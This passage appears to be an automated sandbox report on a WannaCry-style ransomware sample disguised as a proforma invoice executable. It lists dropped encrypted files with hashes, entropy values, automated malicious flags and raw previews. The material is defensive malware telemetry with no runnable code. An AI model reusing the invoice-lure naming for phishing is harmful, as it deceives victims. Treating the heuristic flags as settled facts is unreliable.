                                                          Reputation:unknown
                                                          Preview:WANACRY!.....]4.q.....[..3.G..*.k.....s9..).....s..1Q.V..:L.J4....r...+.'....G...y&..^.<N[..F..-.c..y.Z02E.9...H.,.5T.C.+..ZF.rC.yI<.0"..E...p|~.RQ.b.Ub....#.5...V.^/N.).I.t^.4.N._.4.9..T.s]..y...gvlq(/e.R?.:.s&.p.`j.q!(.9.Eg...(P..(..Yu...Op..fg......Q.c-........ZD..............r.[....'k.@..v.r....mL.....!..Q.l.b.]E`..._..3...K.......5.p.U}......N~....x.e".j.+...6*,..`o.~o4.k...^."F...c't.....G..Hu..A.{..o\......~.%\.......U.^..*.n.V..q2.JN...;.)....\..JS...kI..fm.........k..QZfU_[...w.83u...Wr......h*K.k...K.&.....)....&..;=.=ac...y..rB.yPQj..h...M(.....;.7...h.d..P.r.........0u-;4JM...f..TUn..`F..".=6HX..u............t9.A../..hBQ......H8...cP...3...Sb]!].]...f_ p....N....R7.5M...z.<..3..P..Y!^.&./U.2.r8..t.gM<".._../|...#]}.........Y'....~...Io.y.O...V.O.YV........U=....G.:Z.xf..,..g.Y....=4.._.. ls...(.w..._.N.F.<_?.'......".....p6F...(:<.~_.U.>.......Gi..V.o....q....c.c...'..3..I7.I.T(.j...8.Jn.`p+...a.)ZM..G...B.s.....8......-:H....*.q.A.~.sg.M7
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):776
                                                          Entropy (8bit):7.711524353727964
                                                          Encrypted:false
                                                          SSDEEP:12:bkEL7ILn5JuUNCCSuKise2tOE9jSBS6e0BjFZaZykjm41/5+hmvpbKfHMqA+Q3iH:bkYI3IDteY+g0HZaTjmI5YCpbC9A3ipJ
                                                          MD5:FC290A194C02E3C436B033E9482594F8
                                                          SHA1:2D85C81231D5844A3DA666943A082785A7F695B7
                                                          SHA-256:F54F223CF14436D2E25B87BFAEC81C9EB8EE186244F0F6868C8482EE8A506557
                                                          SHA-512:842E2A9B2964E4A268997C50881508EBAEB620BCAC5C8DD5BAEEC2837DBA49A1D5AC1F46B28080665BDFC901F00D268DB3E2C2D7F07F553E4F6751836F9AE286
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........m...^@o...h......I.|!.'A..l..9.}8n.WK...P..p.;..ze....k.Y2.$@.,.Il....s.....b......o.D...xeA ..~J..o.*.z...$.;7....Q-,..K>80v.Xk...k.X..w....;.MF.....!Q_k...._=.@}.."%.1.`...Nh.G}....h.[UR..bo....'.......T.z>.$.. .B..7.........W..!.n.o....o............L....C.=...jk.]stG....].?........,...l.z..Z.m{Is._.........+.....d...P.ad._;[\.<d}.....8$x#...]..llp=M.p...N.z..G. 3....+...........6&Ip..=W..qK.Ns%fN*...o.j......M9T.5.[X....(...f...?v.P..{..t.^e-..Y...*.<...6.Q.Z.}.O....[Z@..%...X.....Y......YyA.y=..~.w#...[..Z1p/.l.s......z.$f:#..n..n..s....O.[6......++....._...&.........SR..6....`..M.,Z2....@LG..p.m.h....C.s.!..D.....-........Cx. ]..w......u.".j.......XHy........n...Q...y.q.....2.]......I.....a`,........@i.(
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1749912
                                                          Entropy (8bit):7.999908492734295
                                                          Encrypted:true
                                                          SSDEEP:49152:7N21d2SBTQdfmbzAjkk48BS8BfwPAjeTZPa54DDypwTXl:7kvhBufgzP8M8PUPMjeTXl
                                                          MD5:791E4F1205E1F483CBCA4FD047FE8E56
                                                          SHA1:FED8B9D17B6A15A15E1B4577213ED796941F93C7
                                                          SHA-256:9F8F97E2F426539A44D1DA95E45F716EB3F74BE71FE7518FE588ACFB2F393047
                                                          SHA-512:C6B78889E310195E7D5981F59BB23F4916FD2B5A9B1AC8FD76887128898606B7A9820A9DA70AE50D86A45AABBA59125D9FF60E2083AC56BE6118F890203D5568
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....q.pM.Qi.Z...0..K....#......!j^..L...:<.}Dj:.6.=..~.dR.,.+..I2.k.w...0Z.[j....G......%W[7KZB6{eK{SC..U.\...A.b...?g.."..<.,(.........N..#...1...H+>>.......k.....)...C..c..#.Xj........J0.xK~.qm.>.bh..)o?.@.s.....A....FPB4#,.......^...~:]..p.M....{..........0.ig}d.65o...Cr2..C...!.<.5..t......d.y'?.UO....;1....(..T6."...{..(...I..#()....(e.{.s......z/....'.Si@.>.Ez...)......?2.y.<.9...{3.jm.I.H.u.%BH........ou...X....Q...j[..)._..-...Y......Do[\....M....AC,.f....@W..2..........H7.FN\.G..R?\.9_..X......~..>..}.f.n.MP..p.W["-Ckf.6...+.b.. `..&"*:O.`.V..s....6.....`.*F$..R....7.D.H..l.-.......Y@.p....i=@..;...N....7..Q.3..Ghl.m..I0.(..x.;.....A.s. 9.8`...N..y@*a.@1M..s]....L...d...F#.....X......Y.Dpq.7!.W[.z{H.2g..V..o*..'{....M.9.b...V.3......W...].Yh...3b.+...i...#.B....[...Mh..G./4/.......?..)...w.k..~...5......|.........ax.F..(8.K..g...b.m..y..P..>E...[...5Q...J...&4V..8....r.w......f..H.P......W.t.os.y....a..<@o..,r...S..ZK
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):467448
                                                          Entropy (8bit):7.999567972596184
                                                          Encrypted:true
                                                          SSDEEP:12288:ElF+lvd4NJJD/Lg5147lWVtBFjsD/04Fnt+cFF:EMvdylDS4WIt+cr
                                                          MD5:DBFD72E73D40344789C8345BDC5097ED
                                                          SHA1:B361292EE4DF06768E421ED002C21B4CC7A513CE
                                                          SHA-256:AA7336777EFCBDBC05CFEA4487D1B5C91C3CBAD7BC9F5405A30A6AFA93E8A50B
                                                          SHA-512:236C1491C33E5DFBB698D81878EB0CA601415FFCC2C46B9D544603182BB0FF3CC9FE0CA04F5B83D639EA20A48AF28C19918E56F786DA5E55746895261F8B81AB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....M8.....y`Dc..2:.".........I..^..Z.F........=.|-lt.".....j...v.....$O.FS....D.G..|.w;].!..s.K./..[.%..B..k`.RC.30AC[..K..g...OMV.......=....pEFk.v...op3.o..P...8h..rN.d.......).~E.......\..X...`.E.e..5}..XZf<_K.....Q.......$..G..y......B+.6>b......... .......76..e..!.....1.U.Vwn2..1..R..yr.k3.....[..J..WE...ngu....sW......}.x.{V....,u....8^...L...J7H.&6=.. .........$....bK...Z.8p.,O.q.....8jk.@.q.%o.k..#>.6[..D.K#.ny.A>...7..l........P..... w.o6ItHz.{C....$\._j......x...gt.P.LP..\."....Z.....|.t......[y.....n.-9._[r...s..*X.&u....|w.a..g%H.)...n.0.%.pb......g..p..aW8Pk..<c..-.t.B-.;`.l.`.*[.q7..#l...C..Y.5a....uK2O&m.$.Q.1G.y.a..fy....h..*...#.4..")..:.N..;...&at.....Z.z......wH....8...>.C^.p.G.:.....P....'...S...?b.=.......8...>....5..@g.3-...Z7..>......N.!<....;#.eR....L..O..+....Y.^..~E.C.)q&..]...;W..aTF|..s....!.....A8.*7X.....D.qv..E4(6%A.Z.W...Q.m........g@^Ys.Q.G. .....j..........M.=e...S.Fk..L......Z.'k.h.....S.ys.n/4...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9160
                                                          Entropy (8bit):7.9806364551141735
                                                          Encrypted:false
                                                          SSDEEP:96:oRjR9d0YDf2T3kUFS1bzOOkx3aWd6g+qNMua/lE5K86QCZY4BRW5OticYayyXX2O:qdJ47FSuW9N+JWbEcYayEG7u1C8KPO7z
                                                          MD5:8BD14082EEEA4077DC76AD1DB215A8BE
                                                          SHA1:E1158DDC694FC0E7B98B9F8CAE3CAA34A8D421EC
                                                          SHA-256:59612FD30F78D4C9A5AC38992410A0333C6B0E072EEAE23BD4BA3EA9D7EC59E7
                                                          SHA-512:804B08CB5BF8C5ED9F37C937994912A198818536FD90CECC75DBE3528DDEE05E9EEBAB87F492B55F2B550EAC8205700683DC2D65E4E4D17116225C20D5D1DCDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....?.*..X...\...U...O....G..?..Z.....rg0F.]&x.SN(.d..$..3...i...i.90.].P.....A>.|...8-..n..$.r.LQ..N........\K)m.*.(qk.........S.....ZHm....1G_kw...*....g....V.`.H.4.#X..[z......'...d..h....d.#p..fPsA.>.%.1..A...).c.....\I..9{...R....:Go....G..-....."......}O.7.U.i.$.s....& .:..=..z..*b..4..g..Q.*..........B$.=RW.n..p*............F._......F.z....P...}...K.z.R.d.y.. .....(.....e;.uge..mAP.4}3-.......r..7I.x.....7........)qt.k...Bv........:....V.>..&.....Z..9.N..E.G.....xT..\.V...6....AK.5.....q.[....(._..X;.m....J%.....7.J.....V.,}Z..J.cM.9..<.:.b@...ag>...&d.O..Q.k......_.....Z+J.X...Af.d.|....Z..m$..3..v..4..8....zT....C...T}.5.Ho....%..O..ko..$R.Z..;.#...SB...1.#......geO%.L..,h...L2..c.....HV5P........ .lf;....8.:..._.......4..At.....LV....G...I#.h.P#....l.....K...l:s.?..Z...)q{C.*g..N..TK?H.R....U`....-......wt/?.p.<..]..b`...[...=..r...%3......1,..i.'..<..Ns.5y._.U_..:+.)....]...........U'%...i.d..F.....^.7..L
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16056
                                                          Entropy (8bit):7.989213014524283
                                                          Encrypted:false
                                                          SSDEEP:384:vyueVctt+l92ErJuBdqjmOB6gE+QMCYetMqVeI+w4DWC2OOFk8fD:6uqGtipbaOUgSueSqqxDWCr8fD
                                                          MD5:161E560EAD6EE3182BBBEA51D097EDFE
                                                          SHA1:C054AEBEE2B7C593F0C3DABF7D7B08BEE3DE3EC9
                                                          SHA-256:14705846ED3ECD99607CA4382019D563095A2E43C597D07636D2C8D48B0D84F3
                                                          SHA-512:754E51183F40DB00919C0EE159F20AC3CF9BB32FF78927D56628CE01C0BD3530C4A65C04E1452D0D393F2A15625305B76C89EC7AACE9DD4BA2D14807B2627C0F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g......0..Q...so0.C.s...@...M`.cYc...i%...f=........WMHMS.....B.yp..z}.......,..[L}0....a...T)..g........{K}2.:..w.F......`...)....X.Y/........`.....$;rL....EA(|.....gMU.l.).n.j..J3L.E.=..0E.t...v(.EO.V>t.Y.:.;.^..U.i.\R*....P.>.k..kQ..C.....=......D~..4y./.k+.Qr]...SU.D.t.@._..2z...3._.|)..~.n......['....V.q....`....E.n...Tk.V...P......p .....~.f+[-...V"D....l.o......c..F.k{..I, 1.....q...c.;..%Vs.......B.. ....<.....u....lk-,H.9j.....b.F..m[..\...E..y88..u$N.....P.At<...<.a.....s....h).W..!....".Q...Z..~..(..].K...8.....&...........#Q....:2rbF........5\......^".1LZ.....!....Q.j.K..?x.......%......3....dhc.kxT=.x0.R...C\?.b..J*.n......:3...$x.o.RD:.A..mg.:..IA../}..|T......u...B....]......KH...".............?(..U.Lc.'f3.{c.H;.W....=..ti5....v...v.gV.h.y.....`...L.'......2'd...1.$Hv.v...#.FHY..A.\..?.....C.{L(..._O...|..:.."V"H....E._.$....T.....d..^..:F..kuT............>......{....c}...7^...|......i.?p;!.ve.. .JC<
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):105400
                                                          Entropy (8bit):7.998029628276187
                                                          Encrypted:true
                                                          SSDEEP:3072:Cn3LVBtRuJJDOMS7j6iyMaD/PqqXz8ZKV4gBg8q:cYKMBiyDDH3XoQigWF
                                                          MD5:27D290FAC649504A680474A636E90F36
                                                          SHA1:C3A460EC648C641C75DDAD446879463965B7AD3F
                                                          SHA-256:D8C9500A7A82924B11D90C633A603C4CA2B3658A431440885CC3C7B6B49DADEA
                                                          SHA-512:355C6AE27B90CA47EDB571D1ABC6D8BEF79D2383678F3347F71643B5EF6F8591B8AE0ECB408BC40B1679B20F3EE4A019A082CCE8BE45EA90761DB1B3EED9C05F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......N...4u8.!.*..'........LS.P...:BL.......m.l%d.\.2...#x.U&..'C....%.A.-..&)......-.......e..yJ.7..l.,.@`...f.....Y...&..[O.'.c..2@....u.+.d'.g....Z.. G...zD9..Tz......q,..a......O..54W.o"(......,...[..w..|J..P..:..j...',.i...B....PQ..3.x8../.....................k%...[F.<.....JZ...H...a-.$..]..\.U .>J...uU..H.F.....kL.J....^C9....ok..Be#....p....R..........5..._.......Vzf..e..m.T........w.....2. ....n.cy....P.7_....~Q..r...l.....6.O...V....."~.[.-...u[vj...nE......X.|......:..x..h...,v.9...-.:..}V..;W.!..Zk..\...0.N+E^.s.&.$...\.......\m....mH...%......5..#...X...V..)]....;~..../.2...jPBEv.V...R.[_.Z............K.<...}..m4......5%HU..z...p.P/s:...v....e3....9C.&..A.%...r|6...[.D.ke.....l[f..B@E......EC.2...sI]..ZZ....r8!@.>@(OK~...I.2.[<+F...&......=..a..e..... ...).1..[z.p:...-'..K..:Z....fX..^...G...9lY.h_../J..'X......&.].T9.<7..9d.w.A.....k....w..=..n.......&../...F.o..NZ..zXrLx...}v.P..8..A........7...M...f...%..0
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14456
                                                          Entropy (8bit):7.986520658952376
                                                          Encrypted:false
                                                          SSDEEP:384:Zs39Ffvq7IKgpKPt+gL3Vv1QGp2GYsP9OetSyWy:ZiFXz7pKP3VvJ2+AI
                                                          MD5:071E3A319CABC0DF04486E2740B34AB7
                                                          SHA1:6EADC8E33E8F35817B57B65A929BE4B9D833685C
                                                          SHA-256:34718E236AD4F4B4C71F116110149D40ABD196816C1E1A280BB5B08EB9A864E4
                                                          SHA-512:D76157A6C254F8293B4AA6253DB4D9FB1EFF4F6A854C9CB1761A7FECF9BACA61E8570B584AF004A865F131D68EEBB8EF21F59D0AEC308346D6AADAF576474126
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........>Z.-.x?.;.........w.[`.C.:.......=.m.\....M7bA..|....\.Gc.s.....#.[.P..C..!.1.....@btG..|u6.N.?}.Y....m..G..B9.q6&L~......jo10nas..,V..b.Dw......:QX:.....!......mDP.+..;.0....<..:..&.......:[x9bDM.i....M$...g.....3...d5.......!.9..Y...dH;.....W7......v..6`.C^l..cl..R..b.gL...piN..d2..)./.}.QH..l./.H.g.d~.x....|...aJ.'}..wc..F$>.....JW17....(.M.L.V./..~'.QU.B.).ze..f.i......h.D).)....`.w8.;h....[...Rc ._.>.p.G....m&m)..S.[.t...'.m.z0Z...f..b$.:.>^.j..'[G...yP.].....5.3l..x.a....p.\..l...HA,....R.r5a...j._...p.J..4...U.X.E..Q$...S.)Z9......\......1E....fG..-..$7..g.P,Drn..4.....HTv.......U6XT.5...p.....\.]..".b...woLR.`^.2...6h.W6o.7o..PE,cP.z...<....c..)...*....2.d..~P....[...#.hN...y....T....=......6.\.:T.}.O.t5.......7..$..].B.[.g.[z..n.4a@E.|{..`v.}..4.....w.M^w.*.)..7{r._V1...Kl......5.[.x.6....5dMAJ...Mf4=.B.d.c..y.....h.Xf.<....G.%B...S.|.K..K;.>.o..dd.L.:'}..L..T.8n....*.pO.d.q %Ke..%t..)A.n..m.&k..&$..x..S]=N....}s\.3....C
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3160
                                                          Entropy (8bit):7.9389615003129945
                                                          Encrypted:false
                                                          SSDEEP:96:ok+dd/HnyhkLrr9Rg+K39X1YiYTtTn/NSr0CG:z+TdLrrAx3VOdn/NBt
                                                          MD5:0004F2CC5080CF80C4230A6B95A9C864
                                                          SHA1:8B48ACBA4E5AA727CE4F04215BCC4EB673E3A45C
                                                          SHA-256:9663FF62CA63C88897E5D83D332C65CEA4455F6BBF5147DF3578C02CABBD86EC
                                                          SHA-512:8780197A7CB703044767137AA6E12053E6D9838F3FE1123865CA73E204327E49E712FAB205214D09291B8AFE752D21BFE870C16A47C806483ED2D093960BDF86
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....H$...\i.f....ey.p...~...b.........w...cx..9.m....]b....>...k.y....r.V`..a.,Z#.Xb.^.au.v......9..M....+W.(H..l...Ks.y.H...{r6..y..%._...N.)b.a.D.S#......4Z.I..# .0rQ.....io....<..^;1x.+/..?ie...- =....>7C..)Av.......+.V`.@.;...9i*....Mb|J.8..BC....3..........w.z.+.......(...L..oE..v...qz..HSD..RRX...).T.n*....$..T.......N)U'.....<..Zk..../...D..s8}..Hp.Dl}.5...))......jJ.....cA..Q..N.....Y.!.VBec.G.xi...g'RQ..}.k..AZ......+...+.wS.W1.`=*...I.P.Q%..)V.8).l5..8.v.....e....w..!S>S...g..?.?/.N~Iz[.'z..~)...r..B.~.....v...9...7g.3..[.Fl/.5..+........x.{..#&.t}.\).K.6.....t....{...M.r...3x..bf'].....m...C......!.B..9.v..JP.?.:..k+...Y...Z...m.~..iT).^ ..2...E......h.....{....Gb.+G...).FM......I.........#..d.v.gQ..r...9,....8..._.M.......}.........zC.T9.5.....b0...W..7.=.....V.....i..4 .^ ......#]...H6.H.x8....>.....#^.bo....,.:O4..E).> ..3.m.......5O...:!.$.{.HB........5[...T.z...E$gc@...~'J7..2...k.J#c.4.&{]...T..k...{8t..B
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11096
                                                          Entropy (8bit):7.984174097114978
                                                          Encrypted:false
                                                          SSDEEP:192:4BwJF3DxVMHghTi1fZZzt/NHEn2aUwJmMxwSLkpOLIJcz3ZJgf7RroO:4BiNWm21PzRNUwmFopOLIJf71b
                                                          MD5:111A146C4AB1838F77F9E6B264F2B26C
                                                          SHA1:6C1A220062AC04DD56F23A2F701B6AAF29F47644
                                                          SHA-256:B170F9A141DFB8E703933138E521D36E2F3DDE32D21594BB646DE641D9FE2C60
                                                          SHA-512:EF740353E7FE1B37A983298B695C8B4F33FD8D501BB5B2A7DF06CE7876F2228BF0B034EBCE9A22741B7AB1E24696C0136BD62A901F297607B3BB57882B1496D2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....e]F_X.A....<....].T.KF...Z.....e8.5..!@....5.4.=..?).g..,&\1.Q..B..K...Q..|...@a..:.|.V5.A}V..?...:y3.UbI....U?~..D..l..c. ,.&.H.Pk...=..6.@. ).0.k..o.......=2._.Pl..YfQH;...5.>..$..[x.%.}...o...2...f.k......&P........7...[.....&....c.C:N2.Q.....=*......B.V.B.......f.3.{p....#..LB.C..-)....w.I=~tC..J.(...a...Q..^...p..V.1h.}...i..ghL..T.e..<B#.&.....p..+O.F.5..?.W...o...~.4g6.R..F....i.S-....Em....W-..v..W....-...\p.h.oI..+....I.^..Eb3.c.....83.mO..B..%z......y..PA...OO0.J31.Lp......S5A...e....#D..7).k....z..:....&.+N.pJ..i..*)...z..).P..O...A).V\p'..H...|.S...Vt...Z..l.V/.....R..a.oZU........}j...Iq.......$.UF...EUn7..S...>.....='t[T....LrXi0.N....#...'..:.].b..u;[...r....D..v.kq.Qc.e.B|.%./.1/..XD.".#..N.1.vt..`.q...w...h..g.4I...n.E.P'.:Z...z%~....kD..AqN......;<..}...Y*-v........|.:4....U..aY7)nHB..;....[?..U.F".43L...e..Oo}..#7u....v.....B.a.T.f...........E..c...JK!H.@IX.L...niw1...;.....go1....L...A.f...........t......q
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):545288
                                                          Entropy (8bit):7.999629399964461
                                                          Encrypted:true
                                                          SSDEEP:12288:5rtHZ9j0r5Qu1z2X4bBINEsrtobs41AQD23NLayTCPIuyP:51yCu1upNEQcJjthguyP
                                                          MD5:30DBB4C1D0785CC57593FA4F3A750143
                                                          SHA1:0568F1795D4570111C3EB4E3FA4439605EA0B550
                                                          SHA-256:14D4967C81A5D90E2D05F813177F9690C0AC8E1234CB52A9F338222EAF3527BD
                                                          SHA-512:2EBBB06D978272ACD0114E11A824DFC3EC877D67D61EAD4568BC3A456E65C82EE7C0006B24F58BD420EEEAB197A605981AC9E23969435FA862169B32EB0CC115
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....N.......+..F.x.lt.C7bwA...v.YzF.&.Cwy....6.n.H.!.C....er..+{Qjj.Y+..u.&\...H..).....h..c&.6 ,6..b..S):.j.X....E<....f....7\+.!S.n.hP..xd.=,&f.>.,...Bg..E.#...W..=*...7.....tZ..x..y....';L...b...B....KR....z.M..xY$oMR...+..Mxn...:..y.\.&.A...p9.G..&.....P..........N..U...E....3c...F{..KB..`A+y'..........b.6....b. ...=.+j^...&i.e...0._.#..nG`..f....gKp..>.I.s.gEdn6.T.jT.D.y.Z....%...)..#....L.=U.$...s...*..=...V.9.X/U.Un.....9..h...u...Lg..K...|:.c......>5...>E..%...w.=.,...s.....=~.>...{dh!Ix.os.o.._B..k...0j..Y....A..F..a.;.....F.s.0X.Z.wa..Sp..d\...0$.v...d.s...Z.!....g..=,...].1U..z...h.......4I.O...@J...`..UQ.a..@.........1.Hf..4...n.z.....JR...?...z.....t...4,>(R...>%...E$ q<.v..i>c...h.k.i<..W..1y.[.r...y...k.y...d .&.L.1TY.b./.VC.0.@.. ..>}>'..Q..YV..D..'.?..x...+.J.ca............*....'9....\-d....A...f...@..B...@q.Wl6*....&7..~.aT...3..$...V!!.-.. 1!....p..v....x.....a.9...&. 3h....fX......!.Z...F.A...|....&.x~B.l..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):59048
                                                          Entropy (8bit):7.996941542465184
                                                          Encrypted:true
                                                          SSDEEP:1536:UXB57fZ9ldM0iANa6BvNZ5xLU/K0PrJ1PrfystCr:URpfHM0iANF9xGJ17ysM
                                                          MD5:624018D89B8CB9165FD776F227C144E6
                                                          SHA1:2941055FD2F6C08BD7ADFBBF7E53C97C6D9D747C
                                                          SHA-256:145F3B4FDB5DC4E2ED349A93B4BB26784682DCEDA560EA13ECD510AF93A311CC
                                                          SHA-512:24853A0C390783FF2A2118532D88031082497DBC099C06E3E35ADD20C1AA08F500BAD9DB743BAE332638FEA0C68B0BBCEC8B39AD208F21206D3660C9C1DC92E4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):121496
                                                          Entropy (8bit):7.998607095087082
                                                          Encrypted:true
                                                          SSDEEP:1536:LqWLuHlE4GjI9EjYNdKK9OllWsx4aJSSnLvslrI4I8UzAn+raVPMpLFd7PzHi2Ib:jAE4Gjszp9QYabYBrI2+iMN3Hi2IrskD
                                                          MD5:9C6F089439AAC6E186FEC6354CF41979
                                                          SHA1:B94E79B551D1FE64464D87E4BDE4C310C270BE90
                                                          SHA-256:C617D07FB8DD3C2C88C8A7C47369A89A7F472196C4F9D590F6DCAC0B1F219C1E
                                                          SHA-512:CFCA4C62F7C2D7350B1E8B97F9B4EDB1EEC54050EDBD29CD7546D23E468095B67F877D3F653025F7B3957AF5A85DA20668ED5089EACC92AEC0EAAE7F20EDC98B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4024
                                                          Entropy (8bit):7.953319780057477
                                                          Encrypted:false
                                                          SSDEEP:96:oJEdWZZVUvTdoVMbFbSLCnHVT18DEZWuaT:J6ZVeTSVaYi1T2IZA
                                                          MD5:91EC16DAFCAAB89A8264E96BE533AB44
                                                          SHA1:AAD188344DC4CEABF23B0A54265397E2980D5815
                                                          SHA-256:BE79FBCA8FD9702F104E0B8D297EA06182A3D409A14317577C001EDCB2CA3B79
                                                          SHA-512:15CA4DE1271601156305EEFAB270EECC85F679660697E9323DF64A98D5109610848C1AB49E87CD1AA1D35AE20EB425EBC4583FF7269B318A2F047F563025FA77
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):172632
                                                          Entropy (8bit):7.998903407774883
                                                          Encrypted:true
                                                          SSDEEP:3072:D6DlWNDj4cn/0C77dlIBqvjM5JxIR7iBPG/XXvMKIqdzHfvAn4:D6DlGQspdlIhnNBSnvMLqFHgn4
                                                          MD5:6C519C5D90E85F5A89D6D57F8D67B9CE
                                                          SHA1:4F0E425738106F97C3517B2225A13346084877AF
                                                          SHA-256:1B30F8DC19176630B0EFE11F03F8EBDA0CFFD607A5B4877E734D73701E4A3B54
                                                          SHA-512:192B87EF3CB4D78B7C5F608FAD3907188681D73A8C93F97460AA9C418B5FF98C238E1CA8C78FE90ED0D91711358E073F383016255454A92C70A716DFFD188A79
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2184
                                                          Entropy (8bit):7.917347266612112
                                                          Encrypted:false
                                                          SSDEEP:48:bkHYyrT1GogYtvdcT/eBV7qKb2tq4cqjL3ZYEWLsRii9K53zT7:op3yi2LXKAtYEW3/f
                                                          MD5:9C5DFA7DA78405898A443C082A43AE20
                                                          SHA1:71BC3580760F5C9921D4FD535A2B7B70AC2F50FA
                                                          SHA-256:D2C5ACF245699BCD767EA29DC5A18E0EC63D61E4BED3524F4678CBAF83A4A690
                                                          SHA-512:C71D69B3582E38E3A6232FBDF2B072C156D6584D1C120CC1B2B13C6FE29F9FEBF5DDA92F1186B3A759EADAFD992CECAFF033A31368DB044311FBE6EA668A58D6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14648
                                                          Entropy (8bit):7.987260585808005
                                                          Encrypted:false
                                                          SSDEEP:384:Xcy04zPGYSQ36DiCTJznKc3V4rlzU6lrM56BMt:YVYSQKDtKc3OrlzU6lg5sC
                                                          MD5:19DD64CC486640FA7522D3ECA9B269B1
                                                          SHA1:4E5456517C129793EB3DC392317CA2CD90047501
                                                          SHA-256:09D80F7E0C2334EA564209F7D5401992B64BFE4D77A69F061FB7B35018E366DD
                                                          SHA-512:B9EA43D7D346EF83BF938BD6D24AEBAA29FCF4D8B7647922645A19CC9400353402C2C6BF375B3CCA1D97940A0D0FB217F39B1C9F85EF7488A8AA75A8AB5E0FEC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1784
                                                          Entropy (8bit):7.876154023866385
                                                          Encrypted:false
                                                          SSDEEP:24:bkTInSODbd3W8hg9XqJCrbglb/5V/6rah++2Q4s3jUcCB7F3wAU1zuH:bkTInSODJG8ak/Yah++V4s3YNiA/H
                                                          MD5:02AF141BE1FA249E5CCE19A0A5B0C067
                                                          SHA1:DD2DD163586F5128417D6EE00EFEC351CACCCF10
                                                          SHA-256:071E64692198C9C9E64A920B1A17EFC790B5F61D328D4424F6299C32D3F4BCC4
                                                          SHA-512:653E63F5AB31D4E522662B8F1B5BB30030BCA8A39F9D6887A78715604ABDFDE5AA34807088DB318EF373786CCF5C828A1D20BD09E0A87A4CC14151B332FC1939
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7752
                                                          Entropy (8bit):7.972497227192341
                                                          Encrypted:false
                                                          SSDEEP:192:4Krffg9vuuvrUZHxekgWxfafKfz09NojUEDOe5qQPo:/bgxuK4xxvg9fKfIIRpqqo
                                                          MD5:EF94A66403AC50327495D0F4DE19BB1F
                                                          SHA1:900210431EB5447B59A0A46757320CE42CE9DB73
                                                          SHA-256:1192F7309878323A655088EC32529F32736DEE309B03170EA21FF91AB5EF8009
                                                          SHA-512:A9CE5FB1DA0FD5C052E8A4E9FBC3E8983681745B2E6EA6E0646A58C7109C9084F0D664120BEA77A3E569299D994FB71C53C6328B18557813ACF09104DE8205B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44632
                                                          Entropy (8bit):7.996080047097019
                                                          Encrypted:true
